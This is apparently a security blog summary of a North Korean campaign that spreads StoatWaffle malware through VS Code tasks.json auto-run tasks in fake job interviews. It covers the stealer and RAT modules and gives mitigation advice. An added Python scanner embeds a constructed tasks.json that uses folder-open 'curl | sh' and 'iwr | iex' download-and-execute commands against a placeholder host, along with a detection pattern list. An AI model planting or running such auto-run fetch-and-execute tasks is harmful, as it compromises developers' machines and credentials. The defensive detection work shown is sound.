
North Korean Threat Actors Exploit VS Code Task Automation for StoatWaffle Malware Deployment

  • Mar 23
  • 3 min read

Key Findings


  • North Korean threat actors tracked as WaterPlum are distributing StoatWaffle malware through malicious VS Code projects using the "tasks.json" auto-run feature

  • The malware runs as soon as the project folder is opened in VS Code: the tasks.json task is configured to run on folder open, and the task is written with per-platform commands so the download happens on Windows, macOS and Linux alike

  • StoatWaffle includes a credential stealer targeting browsers and a remote access trojan for command execution

  • Attackers are targeting senior engineers, CTOs, and founders in crypto and Web3 sectors through fake recruitment interviews

  • Recent campaigns show evolving tactics, with payload hosting moving from Vercel-based domains to GitHub Gist

  • Related attacks have compromised Neutralinojs GitHub repositories and distributed malware through npm packages


Background


The Contagious Interview campaign, attributed to North Korean threat actors and tracked as WaterPlum, has been operating for years, but the group significantly expanded its malware distribution methods in December 2025. The group is known for impersonating legitimate companies during recruitment processes to gain access to developer systems. Its targets are not junior developers but high-value individuals such as founders and CTOs in the cryptocurrency sector who have access to sensitive infrastructure and digital assets. The shift to VS Code projects represents a new vector in an evolving arsenal of attack methods.


StoatWaffle Malware Architecture


StoatWaffle is built on Node.js and operates as a modular platform. When the malicious project folder is opened in VS Code, a task defined in .vscode/tasks.json and configured to run on folder open executes automatically; it first downloads and installs Node.js if it is not already present on the system. The task then launches a downloader that communicates with external servers to retrieve next-stage payloads, creating a chain of downloaders that execute received code as Node.js scripts. This modular design allows operators to deploy different functionality depending on campaign objectives. Note that VS Code only runs automatic tasks in a trusted workspace and after the user has allowed automatic tasks for that folder (the task.allowAutomaticTasks setting can also be set to "off"), so the staged interview exists largely to walk the victim past those prompts; opening an unknown repository in Restricted Mode and reading .vscode/tasks.json before trusting it defeats this step.
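To make the mechanism concrete, the following added example (written for this summary, not code from the original article or from the threat actor) scans a tasks.json for tasks that run on folder open and lists the command lines they would execute on each platform, flagging common download-and-execute indicators. The sample tasks.json embedded in it is constructed to illustrate the pattern and is not the WaterPlum artefact; the indicator list and the example.invalid URLs are assumptions.

```python
"""Find VS Code tasks that auto-run on folder open and show what they would execute.

The SAMPLE_TASKS_JSON below is a constructed illustration of the auto-run
pattern (runOptions.runOn = folderOpen with per-OS commands), not a real artefact.
"""
import json
import re
from pathlib import Path

# Assumed indicator list: substrings that deserve a human look inside an auto-run task.
SUSPICIOUS = [
    r"\bcurl\b", r"\bwget\b", r"Invoke-WebRequest", r"\biwr\b",
    r"Invoke-Expression", r"\biex\b", r"-EncodedCommand",
    r"\|\s*(ba)?sh\b", r"\bnode\s+-e\b", r"\bbase64\b", r"https?://",
]
SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS), re.IGNORECASE)

SAMPLE_TASKS_JSON = r'''{
  // Constructed sample: one benign task and one auto-run downloader task.
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "npm",
      "script": "build",
    },
    {
      "label": "prepare-env",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "windows": {
        "command": "powershell",
        "args": ["-c", "iwr https://example.invalid/setup.ps1 | iex"],
      },
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    }
  ]
}'''


def load_jsonc(text):
    """tasks.json is JSON with comments; drop comment-only lines and trailing commas."""
    no_comments = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    no_trailing = re.sub(r",(\s*[}\]])", r"\1", no_comments)
    return json.loads(no_trailing)


def task_commands(task):
    """Collect the full command line a task would run: base command plus any
    windows/osx/linux override, each joined with its args."""
    cmds = []
    for scope in (task, task.get("windows", {}), task.get("osx", {}), task.get("linux", {})):
        cmd = scope.get("command")
        if cmd:
            args = [str(a) for a in scope.get("args", [])]
            cmds.append(" ".join([cmd] + args))
    return cmds


def scan_tasks(text):
    """Return one finding per task that VS Code would start on folder open."""
    data = load_jsonc(text)
    findings = []
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmds = task_commands(task)
        hits = sorted({m.group(0) for c in cmds for m in SUSPICIOUS_RE.finditer(c)})
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "commands": cmds,
            # A task that hides its terminal is a second sign it was not meant to be seen.
            "hidden": task.get("presentation", {}).get("reveal") in ("never", "silent"),
            "indicators": hits,
        })
    return findings


def scan_tree(root):
    """Walk a checkout and scan every .vscode/tasks.json beneath it."""
    results = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name == ".vscode":
            results[str(path)] = scan_tasks(path.read_text(encoding="utf-8"))
    return results


if __name__ == "__main__":
    for finding in scan_tasks(SAMPLE_TASKS_JSON):
        print(finding)
```

Run scan_tree against a freshly cloned "interview assignment" before opening it in VS Code; any task with runOn set to folderOpen is worth reading in full, whether or not the indicator list fires, since the regexes are only a starting point and will miss obfuscated commands.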


Stealer and Remote Access Capabilities


The malware deploys two primary modules. The stealer component targets credentials and sensitive data stored in Chromium-based browsers and Firefox, with additional capability to steal iCloud Keychain databases on macOS systems. All stolen data gets uploaded to command-and-control servers. The RAT module enables operators to change directories, enumerate files, execute arbitrary code and commands, upload files, search for files matching keywords, and terminate the malware. Together, these modules provide comprehensive system compromise and data exfiltration capabilities.


Social Engineering and Initial Access


Attackers use convincingly staged recruitment processes that mirror legitimate technical interviews to trick developers into running malicious commands or packages. Victims are approached both directly and through LinkedIn, but targets are specifically chosen for their elevated access to company infrastructure and cryptocurrency assets. Recent examples show attempted targeting of company founders, with victims being asked to execute commands or download repositories hosted on GitHub, GitLab, or Bitbucket as part of the fake interview assessment.


Broader Campaign Operations


WaterPlum's activities extend beyond StoatWaffle. The PolinRider campaign injected malicious JavaScript into hundreds of public GitHub repositories, including four belonging to the Neutralinojs organization, to deploy a new variant of the BeaverTail stealer. Attackers compromised a long-time contributor account with organization-level write access and force-pushed malicious code that retrieves encrypted payloads from blockchain transactions; a branch protection rule that rejects force pushes to protected branches blocks exactly this step, and a force push from a trusted account is itself a signal worth alerting on. Separately, malicious npm packages have been used to distribute PylangGhost malware, marking the first npm-based propagation of this family.


Evolving Tradecraft and Related Malware


The threat actors have demonstrated active refinement of their methods. Newer VS Code project variants have shifted from Vercel-based domains to GitHub Gist-hosted scripts for payload delivery, suggesting adaptation to defensive detections and takedowns. Related malware families deployed in these campaigns include OtterCookie, InvisibleFerret, and FlexibleFerret, which exist in multiple programming language variants, including Go and Python implementations. The group continues to develop and update its malware families regularly, indicating an active and well-resourced operation.


Sources


  • https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

  • https://x.com/shah_sheikh/status/2036161567079698566

  • https://x.com/TheHackersNews/status/2036144058033381433

  • https://x.com/shah_sheikh/status/2036161863407505842/photo/1

© 2025 by Explain IT Again
